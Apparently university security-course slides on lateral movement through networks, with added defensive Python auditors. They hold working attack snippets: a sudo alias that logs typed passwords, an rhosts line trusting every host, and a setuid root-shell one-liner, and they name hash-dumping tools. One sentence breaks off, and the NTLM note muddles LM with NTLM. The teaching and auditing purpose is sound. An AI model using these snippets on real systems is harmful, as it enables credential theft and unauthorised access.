Introduction to Information Security Network Traversal nirkrako at post.tau.ac.il itamargi at post.tau.ac.il.


Network Traversal - Introduction
We now move from discussing the act of hacking a single machine or device to discussing the act of traversing an entire network:
o How organized networks are structured.
o How hackers penetrate organized networks, which are usually administered by a single person or a team of administrators.
o How hackers traverse the network to gain access to more resources and data.

Victim Network
[Figure: victim network diagram; labels: Vertical, Horizontal/Lateral]

Patient 0
A hacker will try to infect one computer by different methods:
o Chance / statistical luck!
o Spear-phishing or human error.
o Social engineering.
o Pure hacking.
After infecting patient 0, hackers can attempt to launch different types of attacks, which now depend on the internal network structure and support mechanisms. By using the information and access readily available on the hacked machine, hackers can attempt to traverse the network laterally.

Spearphishing
“Spear phishing is an spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.” -- ar-phishing

An I received
True story: I received this a few days ago. Can you spot the fail?

Network Users
In an organized network, each user is given a single user/password credential. This password is used to authenticate the user against all machines in the network to which the user should have access.
Example: TAU. Your user and password are used to log in to the *n?x machines as well as the video website.
If a computer used by one of the users is compromised, his credentials, if gained, can be used to log in to all machines in the network.

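Sniffing for passwords
By local example:
.bashrc << __EOF__
# every later "sudo" typed in this shell runs the wrapper instead of the real binary
alias sudo='/tmp/sudo.sh'
__EOF__
/tmp/sudo.sh << __EOF__
#!/bin/bash
# fake prompt: the typed password is written to a log file, then the real sudo runs
echo "Enter password:"
read PASS
echo $PASS > /tmp/.password.log
sudo $1 $2 $3 $4 $5 $6
__EOF__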

Sniffing for passwords
On Windows and other GUI-based applications, key logging is used to record credentials as they are entered.
By actually sniffing the network, looking for “telnet” or other unencrypted communication, where passwords are sent in clear text.
Sniffing the network traffic for hashes, which can later be cracked (more in the next slide).
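
A defender can look for the local alias trick by auditing shell startup files for aliases that shadow credential-prompting commands. The following is an added example, not part of the original slides; the command list, the world-writable directory list and the sample rc file are assumptions made for illustration.

```python
import re

# Commands that prompt for credentials; an alias shadowing one needs review.
SENSITIVE = {"sudo", "su", "ssh", "passwd", "doas"}
# Directories that any local user can write to.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Matches bash form (alias sudo='x') and csh form (alias sudo 'x'),
# with optional quotes around the alias name.
ALIAS_RE = re.compile(
    r"""^\s*alias\s+['"]?(?P<name>[\w.-]+)['"]?\s*(?:=|\s)\s*(?P<value>.+?)\s*$"""
)

def audit_rc(text):
    """Return (line_no, name, target, severity) for suspicious aliases."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = ALIAS_RE.match(line)
        if not m or m.group("name") not in SENSITIVE:
            continue
        words = m.group("value").strip("'\"").split()
        target = words[0] if words else ""
        # alias sudo='sudo ' is a common benign idiom: it still runs sudo.
        if target in (m.group("name"), "/usr/bin/" + m.group("name")):
            continue
        high = target.startswith(WORLD_WRITABLE)
        findings.append((no, m.group("name"), target, "high" if high else "review"))
    return findings

# Constructed sample rc file, not taken from a real system.
SAMPLE_RC = """\
# ~/.bashrc
alias ll='ls -l'
alias sudo='sudo '
alias 'sudo' '/tmp/sudo.sh'
alias ssh="/opt/tools/ssh-wrapper"
"""

if __name__ == "__main__":
    for finding in audit_rc(SAMPLE_RC):
        print(finding)
```

Run it over each user's .bashrc, .profile and the system-wide profile scripts; a "high" finding means the command resolves into a directory any local user can write to.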

Cracking passwords
Gaining root access to /etc/shadow (previously /etc/passwd) leads to obtaining password hashes.
John the Ripper or other password brute-forcing techniques can then be used to retrieve the clear-text password.
The clear-text password can be used to log in to other computers.
Users tend to use the same password for all computers and services, making it easy to gain access to other resources.

rlogin/rsh - history
Instead of logging in all the time, rlogin/rsh is used to authenticate a user without the need to enter a password.
Once a connection is received from a trusted machine, and that machine declares which user is connecting remotely, the user automatically gains access to the remote machine with the same credentials.
Many hacking techniques employ:
o echo "+ +" > ~root/.rhosts
o This lets anybody from any host connect to the computer.
IP spoofing can be used to gain remote access as well.
This poor authentication is still being used in some dark corners of the world.
NFS V < 4 also utilizes the same bad authentication, comparing only host/port (using identd) to identify the user.
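
The "+ +" entry above is easy to find in an audit. The following added example (not part of the original slides) parses .rhosts / hosts.equiv content and reports wildcard trust entries; the sample file content and host names are constructed.

```python
def audit_rhosts(text):
    """Return (line_no, entry, issue) for over-broad trust entries.

    Entry format is "host [user]"; a "+" in either field is a wildcard.
    """
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" and user == "+":
            issue = "any user from any host is trusted"
        elif host == "+":
            issue = "any host is trusted"
        elif user == "+":
            issue = "any user on %s is trusted" % host
        elif host.startswith("+@") or user.startswith("+@"):
            issue = "whole netgroup is trusted; review its membership"
        else:
            continue  # a specific host (and user): no wildcard
        findings.append((no, " ".join(fields), issue))
    return findings

def audit_paths(paths):
    """Audit each readable file in paths; missing files are skipped."""
    report = {}
    for path in paths:
        try:
            with open(path) as fh:
                found = audit_rhosts(fh.read())
        except OSError:
            continue
        if found:
            report[path] = found
    return report

# Constructed sample content, not taken from a real system.
SAMPLE_RHOSTS = """\
# trusted hosts
buildhost.example.org alice
+ +
+ bob
backup.example.org +
"""

if __name__ == "__main__":
    for finding in audit_rhosts(SAMPLE_RHOSTS):
        print(finding)
```

On a live system, pass /etc/hosts.equiv and each home directory's .rhosts to audit_paths().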

Domain of computers

Unix NIS (Network Information Service)
The NIS (formerly known as Yellow Pages/YP) protocol is an old protocol used to sync passwords across a network.
The NIS passwords are used to spread credentials across a network of computers. From each of the servers in the network, access is given to a virtual directory which contains files such as “passwd”, “shadow”, etc.
By using the shell:
# ypcat passwd
o You can get the network hashes of ALL users!
o In a secure network scheme this does not include the root account; however, local account access can be gained on all computers sharing the passwd file.

Pass the hash
Passing the hash is an original way of authentication for SSO (Single Sign On) which is easily exploitable.
In Windows-based systems, by simply passing the hash, a user is able to prove that he has the credentials needed to gain access to a resource (such as a network share).
Once hackers log in to a system, they can use locally existing network hashes to pass them to other systems by this process:
o Gain local administrator privileges.
o View locally logged-in accounts.
o Impersonate a user locally.
o Use regular Windows operations to access network resources.
o Gain more access and run remote code using psexec (Sysinternals utility).

LSASS
Slide was taken from “WCE Internals by Amplia Security”

Hash harvesting
On Windows computers, hashes are saved locally even after a logon session is terminated, in case access to the domain is no longer available.
Several tools in the wild are used to do this hash harvesting, such as:
o WCE – Windows Credential Editor
o Pass The Hash Toolkit.
o gsecdump
o Maybe more.
o pwdump - hash dumping is also possible locally by dumping the SAM file (Security Accounts Manager)
WCE and its like:
o Use ProcessReadMemory() to read the memory of LSASS for harvesting
o Inject code to implement the impersonation of users.
Side note – cracking NTLM hashes:
o NTLM aka NT LanMan (Lan Manager) hashes are DES-based hashes of max 14-byte passwords: each 7 bytes of the password are hashed separately, which makes cracking easier; instead of 256^14 we get 256^7 * 2. Therefore a rainbow table can be easily created.

Unix NFS (Network File System)
Unix NFS is comparable to Windows “Sharing”. It is a method of sharing directories by allowing others to locally mount a remote directory as if it were their own.
As we previously learned, by applying u+s and o+x to a file that hands us root privileges, we are able to escalate our privileges:
o echo 'main(){setuid(0);setgid(0);system("/bin/sh");}' > a.c
o gcc -o a a.c
Misconfigured NFS allows a mounted directory to contain suid files, therefore allowing root on one machine the ability to gain o

Shared binaries patching
Administrators or users share binaries on network shares / NFS (usually installation files).
If those network shares are writable by a hacker, he can modify them and then wait for other users to execute them.
Example at TAU:
mount | grep '/ type'
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr= )
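
An administrator can check for the two NFS conditions described on the last two slides (setuid files honored on a share, and a share mounted read-write) directly from `mount` output. This is an added example, not part of the original slides; the sample lines, host name and address are constructed, and the treatment of a missing sec= option as sec=sys is an assumption.

```python
import re

# One line of `mount` output: SRC on MOUNTPOINT type FSTYPE (opt,opt=val,...)
MOUNT_RE = re.compile(
    r"^(?P<src>\S+) on (?P<mnt>.+?) type (?P<fs>\S+) \((?P<opts>[^)]*)\)$"
)

def audit_nfs_mounts(mount_output):
    """Map each risky NFS mount point to the list of issues found."""
    report = {}
    for line in mount_output.splitlines():
        m = MOUNT_RE.match(line.strip())
        if not m or m.group("fs") not in ("nfs", "nfs4"):
            continue
        # "rw" -> {"rw": ""}, "sec=sys" -> {"sec": "sys"}
        opts = dict(o.strip().partition("=")[::2]
                    for o in m.group("opts").split(","))
        issues = []
        if "nosuid" not in opts:
            issues.append("no nosuid: setuid files on the share are honored")
        if "rw" in opts:
            issues.append("rw: share is writable if the export permits")
        # Assumption: a mount with no sec= option uses AUTH_SYS (sec=sys).
        if opts.get("sec", "sys") == "sys":
            issues.append("sec=sys: server trusts client-supplied UID/GID")
        if issues:
            report[m.group("mnt")] = issues
    return report

# Constructed sample output; host name and address are placeholders.
SAMPLE_MOUNTS = """\
/dev/sda1 on /boot type ext4 (rw,relatime)
filer.example.org:/export/common on /mnt/common type nfs (rw,relatime,vers=3,hard,proto=tcp,sec=sys,addr=192.0.2.10)
filer.example.org:/export/tools on /opt/tools type nfs4 (ro,nosuid,nodev,vers=4.2,sec=krb5p,addr=192.0.2.10)
"""

if __name__ == "__main__":
    for mount_point, issues in audit_nfs_mounts(SAMPLE_MOUNTS).items():
        print(mount_point, issues)
```

The second sample mount shows the hardened form: read-only, nosuid and Kerberos-based security, which produces no findings.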

Questions?